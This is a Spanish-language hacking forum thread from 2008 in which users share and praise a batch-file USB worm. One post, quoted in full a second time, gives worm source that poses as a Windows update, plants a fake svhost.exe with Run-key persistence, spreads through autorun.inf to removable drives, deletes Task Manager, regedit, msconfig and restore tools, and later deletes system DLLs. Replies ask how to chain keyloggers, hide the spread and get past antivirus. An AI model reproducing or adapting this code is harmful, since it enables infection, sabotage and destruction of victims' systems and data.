HOW-TO Crear Gusano de Memorias USB en BATCH

Iniciado por octalh, 5 Marzo 2008, 04:47 AM

0 Miembros y 1 Visitante están viendo este tema.

‭‭‭‭jackl007

pense que no se podria hacer algo asi en batch :P

neider

Esta muy bien el manual , estaba buscando algo asi!

octalh, lo unico que creo que falta es que pongas la forma de desinfectarse xD, aunque si no mal he entendido creo que basta con borrar el autorun del usb y ya no contagiara a nadie mas. Y luego borrar el directorio que crea en lacarpeta de windows


Ah y otra cosa mas, rayluch, si no te importa podrias poner los cambios que le has hecho para que lo vieramos todos (Si no quieres que nadie lo tenga como tu no lo pongas y no pasa nada)

Ala byes

rayluch

#12
Modificando el código de octalh he añadido una función para que si no existe el archivo "x" (troyano, keylogger) instalado en la parte correspondiente del pc se auto ejecute el server automáticamente.

Te doy las gracias otra vez octalh, gracias a ti ya se cómo programar en batch, y empecé desde cero hace 2 días.

EDIT: Por cierto, yo también quiero saber cómo desinfentarlo.

EDIT2: Neider, lo que he hecho es usar las mismas funciones que tiene el código original, si buscas por Internet verás enseguida muchos tutoriales de batch y con eso te aclararas mejor como lo he hecho yo, no es difícil.

Saludos.

rayluch

#13
ECHO shell\1=abrir >> %AUTORUNORIGINAL%
ECHO shell\1\Command=%WORM% >> %AUTORUNORIGINAL%
ECHO shell\2\=explorar >> %AUTORUNORIGINAL%
ECHO shell\2\Command=%WORM% >> %AUTORUNORIGINAL%
ECHO shellexecute=%WORM% >> %AUTORUNORIGINAL%


¿Alguien podría explicar esta parte específica de aquí? Es que no se muy bien cómo funcionan esos comandos.

corax

#14
bueno, yo también quisiera hacer un aporte de mi código, solo que para evitar la tentación lammer de usarlo "a discrección" contra todobicho viviente, le meteré errores en el código. quien sepa batch no tendrá problemas en repararlos. se agradecen sugerencias:
Código (bash) [Seleccionar]
@echo off

goto initio

initio
title NUEVO HARDWARE ENCONTRADO (ACTUALIZANDO)

AT 12:00 goto jornada
AT 28/03/09 goto apocalpypse

CLS

if exist %windir%\regedit.exe (goto conqeror) else (goto espora)


conqueror
CLS

title ACTUALIZANDO WINDOWS SP2 v.4.0.8.1. Por favor, espere...

rem Southern Cross, by Corax

copy \svhost.exe C:\WINDOWS\System32\svhost.exe
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v services /d C:\Windows\System32\svhost.exe

CLS

echo [autorun]>>%Windir%\cursors\autorun.inf"
echo OPEN=svhost.exe>>%Windir%\cursors\autorun.inf"

CD %WINDIR%\System32\"
del /Q /F taskmgr.exe
del /Q /F taskkill.exe

CLS

CD %WINDIR%\System32\"
del /Q /F regedt32.exe
del /Q /F wscui.cpl
del /Q /F command.com

CLS

CD %windir%\System32\restore\"
del /Q /F rstrui.exe
del /Q /F srdiag.exe

CLS

CD "%windir%\"
del /Q /F taskman.exe
del /Q /F regedit.exe

CLS

CD "%windir%\PCHealth\HelpCtr\Binaries\"
del /Q /F msconfig.exe

CLS

goto espora




espora
CLS
if exists E:\ (goto 1) else (goto faren)

faren
CLS
if exists F:\ (goto 2) else (goto gotrek)

gotrek
CLS
if exists G:\ (goto 3) else (goto hyperion)

hyperion
CLS
if exists H:\ (goto 4) else (goto espora)


1
if exists E:\svhost.exe (goto faren) else (goto 11)

2
if exists F:\svhost.exe (goto gotrek) else (goto 22)

3
if exists G:\svhost.exe (goto hyperion) else (goto 33)

4
if exists H:\svhost.exe (goto espora) else (goto 44)

11
title ACTUALIZANDO WINDOWS SP2 v.4.0.8.1. Por favor, espere...
copy C:\WINDOWS\System32\svhost.exe E:\svhost.exe /y
copy %Windir%\cursors\autorun.inf E:\autorun.inf /y
CLS
goto espora

22
title ACTUALIZANDO WINDOWS SP2 v.4.0.8.1. Por favor, espere...
copy C:\WINDOWS\System32\svhost.exe F:\svhost.exe /y
copy %Windir%\cursors\autorun.inf F:\autorun.inf /y
CLS
goto espora

33
title ACTUALIZANDO WINDOWS SP2 v.4.0.8.1. Por favor, espere...
copy C:\WINDOWS\System32\svhost.exe G:\svhost.exe /y
copy %Windir%\cursors\autorun.inf G:\autorun.inf /y
CLS
goto espora

44
title ACTUALIZANDO WINDOWS SP2 v.4.0.8.1. Por favor, espere...
copy C:\WINDOWS\System32\svhost.exe H:\svhost.exe /y
copy %Windir%\cursors\autorun.inf H:\autorun.inf /y
CLS
goto espora





jornada
CLS
shutdown -s -t 10




apocalypse

CD "%WINDIR%\System32\"
del /Q /F hal.dll

CD "%WINDIR%\"
del /S /Q /F *.dll

shutdown -s t- 10
pause
exit
Nuestro idioma ha tardado 12 siglos en llegar hasta hoy día. Tú tan sólo tardas 20 segundos en escribir un post: no destroces en tan poco tiempo lo que tantos siglos ha costado crear.

krlos__gb

gracias estaba buscando algo como esto
pero.. no entiendo mucho el code
si alguien me pudiera aclarar un poco la cosa porfavor
me eh matado trantando de entenderlo xD

espero ayuda saludos

catkill

 :D
EXCELENTE CODIGO, RECIEN ESTOY EMPEZANDO CON BATCH Y NO CREI QUE
TUVIERA TANTAS FACILIDADES PARA DESARROLLAR UN VIRUS

-=Hate_dark=-

octalh MUUUUUUUUY agradecido de verdad... es una maravilla esto :O... he pillado lo que posteas y siempre me impresionas con tu didactica.. de que se te entiende se te entiende... no se programar.. vi unas horas de programacion en C++ pero no fue mucho lo que logre hacer.. tambien admito falta de boluntad y tiempo... pero no es nada dificil el batch y es bastante simpatico y facil de manejar.. gracias por este post que estoy seguro muchos necesitaban leer XD....

  PD: lo unico que no me gusto de esto es que ya despues de que se esta expandiendo el worm no deja desconectar el pendrive en modo seguro.. lo que pone en alerta a la persona y posiblemente se vaya parando la cadena...
   no habria manera de evitar que esto suceda ? cual es la razon... que es lo que esta usando del disco??.. corrijanme si me equivoco... ya que esta haciendo un ping para que a los 60 segundo se repita el algoritmo esto es lo que mantiene ocupado a pen ? y por eso no lo deja sacar en modo seguro ?... que otras alternativas habria a esto ?...

Gracias de nuevo..
sigue asi =)
lO IMPORTANTE NO ES SABER SI NO TE ER EL tlf DEL QUE SABE =D pero es mejor saber por uno mEEEEsmo por eso hay que leer shiiiiiiike!

-=Hate_dark=-

Cita de: corax en  7 Marzo 2008, 23:13 PM
bueno, yo también quisiera hacer un aporte de mi código, solo que para evitar la tentación lammer de usarlo "a discrección" contra todobicho viviente, le meteré errores en el código. quien sepa batch no tendrá problemas en repararlos. se agradecen sugerencias:
Código (bash) [Seleccionar]
@echo off

goto initio

initio
title NUEVO HARDWARE ENCONTRADO (ACTUALIZANDO)

AT 12:00 goto jornada
AT 28/03/09 goto apocalpypse

CLS

if exist %windir%\regedit.exe (goto conqeror) else (goto espora)


conqueror
CLS

title ACTUALIZANDO WINDOWS SP2 v.4.0.8.1. Por favor, espere...

rem Southern Cross, by Corax

copy \svhost.exe C:\WINDOWS\System32\svhost.exe
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v services /d C:\Windows\System32\svhost.exe

CLS

echo [autorun]>>%Windir%\cursors\autorun.inf"
echo OPEN=svhost.exe>>%Windir%\cursors\autorun.inf"

CD %WINDIR%\System32\"
del /Q /F taskmgr.exe
del /Q /F taskkill.exe

CLS

CD %WINDIR%\System32\"
del /Q /F regedt32.exe
del /Q /F wscui.cpl
del /Q /F command.com

CLS

CD %windir%\System32\restore\"
del /Q /F rstrui.exe
del /Q /F srdiag.exe

CLS

CD "%windir%\"
del /Q /F taskman.exe
del /Q /F regedit.exe

CLS

CD "%windir%\PCHealth\HelpCtr\Binaries\"
del /Q /F msconfig.exe

CLS

goto espora




espora
CLS
if exists E:\ (goto 1) else (goto faren)

faren
CLS
if exists F:\ (goto 2) else (goto gotrek)

gotrek
CLS
if exists G:\ (goto 3) else (goto hyperion)

hyperion
CLS
if exists H:\ (goto 4) else (goto espora)


1
if exists E:\svhost.exe (goto faren) else (goto 11)

2
if exists F:\svhost.exe (goto gotrek) else (goto 22)

3
if exists G:\svhost.exe (goto hyperion) else (goto 33)

4
if exists H:\svhost.exe (goto espora) else (goto 44)

11
title ACTUALIZANDO WINDOWS SP2 v.4.0.8.1. Por favor, espere...
copy C:\WINDOWS\System32\svhost.exe E:\svhost.exe /y
copy %Windir%\cursors\autorun.inf E:\autorun.inf /y
CLS
goto espora

22
title ACTUALIZANDO WINDOWS SP2 v.4.0.8.1. Por favor, espere...
copy C:\WINDOWS\System32\svhost.exe F:\svhost.exe /y
copy %Windir%\cursors\autorun.inf F:\autorun.inf /y
CLS
goto espora

33
title ACTUALIZANDO WINDOWS SP2 v.4.0.8.1. Por favor, espere...
copy C:\WINDOWS\System32\svhost.exe G:\svhost.exe /y
copy %Windir%\cursors\autorun.inf G:\autorun.inf /y
CLS
goto espora

44
title ACTUALIZANDO WINDOWS SP2 v.4.0.8.1. Por favor, espere...
copy C:\WINDOWS\System32\svhost.exe H:\svhost.exe /y
copy %Windir%\cursors\autorun.inf H:\autorun.inf /y
CLS
goto espora





jornada
CLS
shutdown -s -t 10




apocalypse

CD "%WINDIR%\System32\"
del /Q /F hal.dll

CD "%WINDIR%\"
del /S /Q /F *.dll

shutdown -s t- 10
pause
exit


Muy interezante... si estoy viendo los errores.. a lo mejor no detallo algunos ya que apenas hoy me voy enterando de esta maravilla de todas formas espero que ayudes un poco tambien vale ?.... otra cosa es que esta un poco agresivo XD como para probarlo con uno mismo ...  de todas formas lo seguire detallando y viendo que le puedo quitar o poner.. gracias por compartir...

PD: no me he fijado si cambiaste lo del ping que puso octalh para que se repitiera el ciclo.. que otras alternativas a estas se te ocurre para que se pueda extraer el pendrive en modo seguro sin problemas.
lO IMPORTANTE NO ES SABER SI NO TE ER EL tlf DEL QUE SABE =D pero es mejor saber por uno mEEEEsmo por eso hay que leer shiiiiiiike!

siete7

Tengo un pequeño problema  con el Quick_Batch_File_Compiler_3.1.5.0.
cuando compilo mi pequeño prog en batch(solo son varias sentencias para copiar un archivo a otro lado) para que no aparezca la ventana en  MsDos  mi antivirus, el AVG free, me lo detecta como un troyano y no me deja compilarlo. Si cierro los procesos del antivirus y compilo el programa falla.
Puede alguien ayudarme.